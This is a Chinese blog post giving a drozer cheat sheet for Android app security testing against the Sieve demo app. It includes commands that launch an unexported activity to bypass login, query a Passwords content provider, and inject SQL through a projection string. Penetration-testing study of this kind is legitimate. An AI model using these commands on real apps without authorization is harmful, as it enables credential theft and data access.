Mr.Tcsy's blog Mr.Tcsy's blog

神器之drozer使用

in 学习笔记,移动安全 read (27) 文章转载请注明来源!

使用过程
电脑和模拟器(手机)都安装drozer,使用手机的话,需要数据线连接电脑,并启用usb调试模式

模拟器(手机)端开启drozer

电脑端使用adb端口转发:adb forward tcp:31415 tcp:31415

进行连接:drozer.bat console connect

常用命令
获取所有包名:run app.package.list

获取带有sieve的包名:run app.package.list –f sieve

查看信息:run app.package.info –a com.mwr.example.sieve

查看攻击面:run app.package.attacksurface com.mwr.example.sieve

查看activity漏洞点:run app.activity.info -a com.mwr.example.sieve

activity越权:run app.activity.start –component com.mwr.example.sieve com.mwr.example.sieve.PWLi

查看service漏洞:run app.service.info -a com.mwr.example.sieve

查看Broadcast Receiver漏洞:run app.broadcast.info –a com.mwr.example.sieve

查看Content Provider漏洞点:run app.provider.info -a com.mwr.example.sieve

扫描数据库信息:run scanner.provider.finduris -a com.mwr.example.sieve

查看数据信息: run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/

执行sql语句:run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ –projection “* FROM SQLITE_MASTER WHERE type=’table’;–”

扫描注入:run scanner.provider.injection -a com.mwr.example.sieve

扫描目录遍历:run scanner.provider.traversal -a com.mwr.example.sieve

本文基于《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权
文章链接:https://secsb.com/archives/26/ (转载时请注明本文出处及文章链接)

学习笔记移动安全
发表新评论
博客已萌萌哒运行
© 2018 由 Typecho 强力驱动.Theme by YoDu 冀ICP备17018029号-1
PREVIOUS NEXT
雷姆
拉姆